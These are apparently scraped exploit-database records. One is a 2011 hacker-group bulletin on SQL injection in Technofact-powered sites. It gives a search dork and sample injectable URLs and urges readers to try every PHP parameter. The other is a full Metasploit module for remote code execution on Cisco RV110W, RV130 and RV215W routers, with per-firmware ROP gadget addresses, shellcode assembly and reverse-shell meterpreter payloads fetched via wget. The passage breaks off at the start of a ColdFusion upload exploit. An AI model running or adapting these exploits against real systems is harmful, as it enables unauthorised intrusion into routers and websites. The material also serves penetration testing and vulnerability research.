{"published": "2011-06-13T00:00:00", "id": "1337DAY-ID-16320", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T02:27:05", "bulletin": {"published": "2011-06-13T00:00:00", "id": "1337DAY-ID-16320", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 9.0, "modified": "2016-04-19T02:27:05", "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "hash": "e373a653a77ba4f956fefdb7caeec8082d0cb0365b92b47b6e6e9026ed85a0bc", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T02:27:05", "edition": 1, "title": "Technofact (index/detail) => SQL Injection Vulnerability", "href": "http://0day.today/exploit/description/16320", "modified": "2011-06-13T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/16320", "references": [], "reporter": "eXeSoul", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : 1337day.com 0\r\n1 [+] Support e-mail : submit[at]1337day.com 1\r\n0 0\r\n1 ##################################### 1\r\n0 I'm eXeSoul member from Inj3ct0r Team 1\r\n1 ##################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n##################################################################\r\n# Title : Technofact(index/detail)=>SQL Injection Vulnerability\r\n#\r\n# Author: eXeSoul\r\n#\r\n# Home : 1337day.com / www.indishell.in or www.andhrahackers.com\r\n#\r\n# Email : exe.soul@live.com\r\n#\r\n# date : 13/6/2011\r\n#\r\n# d0rk:- POWERED BY: WWW.TECHNOFACT.COM \r\n# Poweard By | Technofact\r\n# \r\n#\r\n# category : Web Apps [SQli] \r\n# \r\n##################################################################\r\n##################################################################\r\n#\r\n# [1]\r\n#\r\n# Go To Site :-\r\n#\r\n# \r\n# \r\n# * SQL injection Vulnerability*\r\n#\r\n#\r\n# http://site.com/index.php?page_id=47' <= SQLI\r\n#\t http://site.com/solar/index.php?page_id=2' <= SQLI\r\n#\t http://site.com/detail.php?page_id=5' <= SQLI\r\n#\t \r\n#\t \r\n# \r\n# Check all .php?*= , mostly all vul.. to sqli.! \r\n#\r\n# => PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam\r\n#\r\n# => c0d3 for motherland, h4ck for motherland\r\n#\r\n#\r\n# \r\n# [#] DOne now time to rock \\m/\r\n#\r\n# \r\n#\r\n####################################################################\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n<3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, Th3 RDX,\r\nG00g!3 W@rr!0r, Nazz , str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor , Bon3 ,KnocKout,\r\nBadboy-Albinia, Mr.SK ,X__HMG, AK-47, [ICW] [Andhra Hackers], Ethical N00b,Maxy,Brueni,\r\n[Indishell crew],r00t-Devil , inj3ct0r 1337 team , r0073r , Sid3^effects , r4dc0re , KedAns-Dz\r\n(+)<3 to :Indian Cyber Army & Indishell Crew \r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n####################################################################\r\n#\r\n# Bug discovered : 13 Jun 2011\r\n####################################################################\r\n#\r\n# Jay Mahadev.!! Jay shree Ram.!! jay Shree krishna.!! Jay hind.!!\r\n#\r\n####################################################################\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "59e03ecff29206653ec659ef4a59dd46", "key": "published"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "ef7db2e8d75f168949fc7f2b9f69c1f3", "key": "sourceHref"}, {"hash": "dd09a84505d34f44d99c8222c964ae4e", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "59e03ecff29206653ec659ef4a59dd46", "key": "modified"}, {"hash": "efd6b8fa5684cc21b4657fc157db966e", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "c22823fc909ff6820ebf797515a3b5ab", "key": "reporter"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "018010ac6584911d25e9b364b8e24272", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "52787d62bdd475ce7a475837ed229c50528d2a9a8377b10f5ce8d3b03a0885ed", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-03-20T09:11:28"}, "dependencies": {"references": [{"type": "avleonov", "idList": ["AVLEONOV:54F79F8B5C71E738DB16AEA2DF8FFD2F"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/SAMBA/USERMAP_SCRIPT"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16320", "SECURITYVULNS:VULN:7376"]}], "modified": "2018-03-20T09:11:28"}, "vulnersScore": 0.1}, "type": "zdt", "lastseen": "2018-03-20T09:11:28", "edition": 2, "title": "Technofact (index/detail) => SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/16320", "modified": "2011-06-13T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/16320", "references": [], "reporter": "eXeSoul", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : 1337day.com 0\r\n1 [+] Support e-mail : submit[at]1337day.com 1\r\n0 0\r\n1 ##################################### 1\r\n0 I'm eXeSoul member from Inj3ct0r Team 1\r\n1 ##################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n##################################################################\r\n# Title : Technofact(index/detail)=>SQL Injection Vulnerability\r\n#\r\n# Author: eXeSoul\r\n#\r\n# Home : 1337day.com / www.indishell.in or www.andhrahackers.com\r\n#\r\n# Email : [email\u00a0protected]\r\n#\r\n# date : 13/6/2011\r\n#\r\n# d0rk:- POWERED BY: WWW.TECHNOFACT.COM \r\n# Poweard By | Technofact\r\n# \r\n#\r\n# category : Web Apps [SQli] \r\n# \r\n##################################################################\r\n##################################################################\r\n#\r\n# [1]\r\n#\r\n# Go To Site :-\r\n#\r\n# \r\n# \r\n# * SQL injection Vulnerability*\r\n#\r\n#\r\n# http://site.com/index.php?page_id=47' <= SQLI\r\n#\t http://site.com/solar/index.php?page_id=2' <= SQLI\r\n#\t http://site.com/detail.php?page_id=5' <= SQLI\r\n#\t \r\n#\t \r\n# \r\n# Check all .php?*= , mostly all vul.. to sqli.! \r\n#\r\n# => PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam\r\n#\r\n# => c0d3 for motherland, h4ck for motherland\r\n#\r\n#\r\n# \r\n# [#] DOne now time to rock \\m/\r\n#\r\n# \r\n#\r\n####################################################################\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n<3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, Th3 RDX,\r\nG00g!3 [email\u00a0protected]!0r, Nazz , str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor , Bon3 ,KnocKout,\r\nBadboy-Albinia, Mr.SK ,X__HMG, AK-47, [ICW] [Andhra Hackers], Ethical N00b,Maxy,Brueni,\r\n[Indishell crew],r00t-Devil , inj3ct0r 1337 team , r0073r , Sid3^effects , r4dc0re , KedAns-Dz\r\n(+)<3 to :Indian Cyber Army & Indishell Crew \r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n####################################################################\r\n#\r\n# Bug discovered : 13 Jun 2011\r\n####################################################################\r\n#\r\n# Jay Mahadev.!! Jay shree Ram.!! jay Shree krishna.!! Jay hind.!!\r\n#\r\n####################################################################\r\n\r\n\n\n# 0day.today [2018-03-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "d6bf68eec1f308acc7651c3be75e370e", "key": "href"}, {"hash": "59e03ecff29206653ec659ef4a59dd46", "key": "modified"}, {"hash": "59e03ecff29206653ec659ef4a59dd46", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c22823fc909ff6820ebf797515a3b5ab", "key": "reporter"}, {"hash": "30a460f635f238f58baed62e63dfc27e", "key": "sourceData"}, {"hash": "d1e9a4f82739128310e8a5a3586098c3", "key": "sourceHref"}, {"hash": "018010ac6584911d25e9b364b8e24272", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"metasploit": [{"lastseen": "2019-12-04T08:35:04", "bulletinFamily": "exploit", "description": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected. RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected. Note: successful exploitation may not result in a session, and as such, on_new_session will never repair the HTTP server, leading to a denial-of-service condition.\n", "modified": "2019-10-27T16:25:56", "published": "2019-07-27T08:47:58", "id": "MSF:EXPLOIT/LINUX/HTTP/CVE_2019_1663_CISCO_RMI_RCE", "href": "", "type": "metasploit", "title": "Cisco RV110W/RV130(W)/RV215W Routers Management Interface Remote Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# linux/armle/meterpreter/bind_tcp -> segfault\n# linux/armle/meterpreter/reverse_tcp -> segfault\n# linux/armle/meterpreter_reverse_http -> works\n# linux/armle/meterpreter_reverse_https -> works\n# linux/armle/meterpreter_reverse_tcp -> works\n# linux/armle/shell/bind_tcp -> segfault\n# linux/armle/shell/reverse_tcp -> segfault\n# linux/armle/shell_bind_tcp -> segfault\n# linux/armle/shell_reverse_tcp -> segfault\n#\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Module::Deprecated\n\n moved_from 'exploit/linux/http/cisco_rv130_rmi_rce'\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Cisco RV110W/RV130(W)/RV215W Routers Management Interface Remote Command Execution',\n 'Description' => %q{\n A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall,\n Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router\n could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.\n\n The vulnerability is due to improper validation of user-supplied data in the web-based management interface.\n An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.\n\n A successful exploit could allow the attacker to execute arbitrary code on the underlying operating\n system of the affected device as a high-privilege user.\n\n RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected.\n RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.\n RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected.\n\n Note: successful exploitation may not result in a session, and as such,\n on_new_session will never repair the HTTP server, leading to a denial-of-service condition.\n },\n 'Author' =>\n [\n 'Yu Zhang', # Initial discovery (GeekPwn conference)\n 'Haoliang Lu', # Initial discovery (GeekPwn conference)\n 'T. Shiomitsu', # Initial discovery (Pen Test Partners)\n 'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => %w[linux],\n 'Arch' => [ARCH_ARMLE, ARCH_MIPSLE],\n 'SessionTypes' => %w[meterpreter],\n 'CmdStagerFlavor' => %w{ wget },\n 'Privileged' => true, # BusyBox\n 'References' =>\n [\n ['CVE', '2019-1663'],\n ['BID', '107185'],\n ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],\n ['URL', 'https://www.pentestpartners.com/security-blog/cisco-rv130-its-2019-but-yet-strcpy/']\n ],\n 'DefaultOptions' => {\n 'WfsDelay' => 10,\n 'SSL' => true,\n 'RPORT' => 443,\n 'CMDSTAGER::FLAVOR' => 'wget',\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n },\n 'Targets' =>\n [\n [ 'Cisco RV110W 1.1.0.9',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af06000,\n 'libcrypto_base_addr' => 0x2ac01000,\n 'system_offset' => 0x00050d40,\n 'got_offset' => 0x0009d560,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x00167c8c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV110W 1.2.0.9',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af08000,\n 'libcrypto_base_addr' => 0x2ac03000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x00167c4c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV110W 1.2.0.10',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af09000,\n 'libcrypto_base_addr' => 0x2ac04000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV110W 1.2.1.4',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af54000,\n 'libcrypto_base_addr' => 0x2ac4f000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV110W 1.2.1.7',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af98000,\n 'libcrypto_base_addr' => 0x2ac4f000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV130/RV130W < 1.0.3.45',\n {\n 'offset' => 446,\n 'libc_base_addr' => 0x357fb000,\n 'system_offset' => 0x0004d144,\n 'gadget1' => 0x00020e79, # pop {r2, r6, pc};\n 'gadget2' => 0x00041308, # mov r0, sp; blx r2;\n 'Arch' => ARCH_ARMLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',\n }\n },\n ],\n [ 'Cisco RV215W 1.1.0.5',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af59000,\n 'libcrypto_base_addr' => 0x2ac54000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV215W 1.1.0.6',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af59000,\n 'libcrypto_base_addr' => 0x2ac54000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV215W 1.2.0.14',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af5f000,\n 'libcrypto_base_addr' => 0x2ac5a001,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV215W 1.2.0.15',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af5f000,\n 'libcrypto_base_addr' => 0x2ac5a000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV215W 1.3.0.7',\n {\n 'offset' => 77,\n 'libc_base_addr' => 0x2afeb000,\n 'libcrypto_base_addr' => 0x2aca5000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x000a0530,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x00057bec, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV215W 1.3.0.8',\n {\n 'offset' => 77,\n 'libc_base_addr' => 0x2afee000,\n 'libcrypto_base_addr' => 0x2aca5000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x000a0530,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n ],\n 'DisclosureDate' => 'Feb 27 2019',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SERVICE_DOWN, ],\n },\n ))\n end\n\n def p(lib, offset)\n [(lib + offset).to_s(16)].pack('H*').reverse\n end\n\n def prepare_shellcode(cmd)\n case target\n # RV110W 1.1.0.9, 1.2.0.9, 1.2.0.10, 1.2.1.4, 1.2.1.7\n # RV215W 1.1.0.5, 1.1.0.6, 1.2.0.14, 1.2.0.15, 1.3.0.7, 1.3.0.8\n when targets[0], targets[1], targets[2], targets[3], targets[4], targets[6], targets[7], targets[8], targets[9], targets[10], targets[11]\n shellcode = rand_text_alpha(target['offset']) + # filler\n rand_text_alpha(4) + # $s0\n rand_text_alpha(4) + # $s1\n rand_text_alpha(4) + # $s2\n rand_text_alpha(4) + # $s3\n p(target['libc_base_addr'], target['system_offset']) + # $s4\n rand_text_alpha(4) + # $s5\n rand_text_alpha(4) + # $s6\n rand_text_alpha(4) + # $s7\n rand_text_alpha(4) + # $s8\n p(target['libcrypto_base_addr'], target['gadget1']) + # $ra\n p(target['libc_base_addr'], target['got_offset']) +\n rand_text_alpha(28) +\n cmd\n shellcode\n when targets[5] # RV130/RV130W\n shellcode = rand_text_alpha(target['offset']) + # filler\n p(target['libc_base_addr'], target['gadget1']) +\n p(target['libc_base_addr'], target['system_offset']) + # r2\n rand_text_alpha(4) + # r6\n p(target['libc_base_addr'], target['gadget2']) + # pc\n cmd\n shellcode\n end\n end\n\n def send_request(buffer)\n begin\n send_request_cgi({\n 'uri' => '/login.cgi',\n 'method' => 'POST',\n 'vars_post' => {\n \"submit_button\": \"login\",\n \"submit_type\": \"\",\n \"gui_action\": \"\",\n \"wait_time\": 0,\n \"change_action\": \"\",\n \"enc\": 1,\n \"user\": rand_text_alpha_lower(5),\n \"pwd\": buffer,\n \"sel_lang\": \"EN\"\n }\n })\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the router\")\n end\n end\n\n def check\n\n # We fingerprint devices using SHA1 hash of a web resource accessible to unauthenticated users.\n # We use lang_pack/EN.js because it's the one file that changes the most between versions.\n # Note that it's not a smoking gun given that some branches keep the exact same files in /www\n # (see RV110 branch 1.2.1.x/1.2.2.x, RV130 > 1.0.3.22, RV215 1.2.0.x/1.3.x)\n\n fingerprints = {\n \"69d906ddd59eb6755a7b9c4f46ea11cdaa47c706\" => {\n \"version\" => \"Cisco RV110W 1.1.0.9\",\n \"status\" =>Exploit::CheckCode::Vulnerable\n },\n \"8d3b677d870425198f7fae94d6cfe262551aa8bd\" => {\n \"version\" => \"Cisco RV110W 1.2.0.9\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"134ee643ec877641030211193a43cc5e93c96a06\" => {\n \"version\" => \"Cisco RV110W 1.2.0.10\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"e3b2ec9d099a3e3468f8437e5247723643ff830e\" => {\n \"version\" => \"Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)\",\n \"status\" => Exploit::CheckCode::Unknown\n },\n \"6b7b1e8097e8dda26db27a09b8176b9c32b349b3\" => {\n \"version\" => \"Cisco RV130/RV130W 1.0.0.21\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"9b1a87b752d11c5ba97dd80d6bae415532615266\" => {\n \"version\" => \"Cisco RV130/RV130W 1.0.1.3\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"9b6399842ef69cf94409b65c4c61017c862b9d09\" => {\n \"version\" => \"Cisco RV130/RV130W 1.0.2.7\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"8680ec6df4f8937acd3505a4dd36d40cb02c2bd6\" => {\n \"version\" => \"Cisco RV130/RV130W 1.0.3.14, 1.0.3.16\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"8c8e05de96810a02344d96588c09b21c491ede2d\" => {\n \"version\" => \"Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)\",\n \"status\" => Exploit::CheckCode::Unknown\n },\n \"2f29a0dfa78063d643eb17388e27d3f804ff6765\" => {\n \"version\" => \"Cisco RV215W 1.1.0.5\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f\" => {\n \"version\" => \"Cisco RV215W 1.1.0.6\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"7cc8fcce5949a68c31641c38255e7f6ed31ff4db\" => {\n \"version\" => \"Cisco RV215W 1.2.0.14 or 1.2.0.15\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"050d47ea944eaeadaec08945741e8e380f796741\" => {\n \"version\" => \"Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)\",\n \"status\" => Exploit::CheckCode::Unknown\n }\n }\n\n uri = target_uri.path\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, 'lang_pack/EN.js')\n })\n if res && res.code == 200\n fingerprint = Digest::SHA1.hexdigest(\"#{res.body.to_s}\")\n if fingerprints.key?(fingerprint)\n print_good(\"Successfully identified device: #{fingerprints[fingerprint][\"version\"]}\")\n return fingerprints[fingerprint][\"status\"]\n else\n print_status(\"Couldn't reliably fingerprint the target.\")\n end\n end\n Exploit::CheckCode::Unknown\n end\n\n def exploit\n print_status('Sending request')\n execute_cmdstager\n end\n\n def execute_command(cmd, opts = {})\n shellcode = prepare_shellcode(cmd.to_s)\n send_request(shellcode)\n end\n\n def on_new_session(session)\n # Given there is no process continuation here, the httpd server will stop\n # functioning properly and we need to take care of proper restart\n # ourselves.\n print_status(\"Reloading httpd service\")\n reload_httpd_service = \"killall httpd && cd /www && httpd && httpd -S\"\n if session.type.to_s.eql? 'meterpreter'\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\n session.sys.process.execute '/bin/sh', \"-c \\\"#{reload_httpd_service}\\\"\"\n else\n session.shell_command(reload_httpd_service)\n end\n ensure\n super\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/cve_2019_1663_cisco_rmi_rce.rb"}, {"lastseen": "2019-12-12T23:12:46", "bulletinFamily": "exploit", "description": "A file upload vulnerability in the CKEditor of Adobe ColdFusion 11 (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and ColdFusion 2018 (July 12 release) allows unauthenticated remote attackers to upload and execute JSP files through the filemanager plugin. Tested on Adobe ColdFusion 2018.0.0.310739.\n", "modified": "2019-01-10T12:39:45", "published": "2019-01-06T03:55:20", "id": "MSF:EXPLOIT/MULTI/HTTP/COLDFUSION_CKEDITOR_FILE_UPLOAD", "href": "", "type": "metasploit", "title": "Adobe ColdFusion CKEditor unrestricted file upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 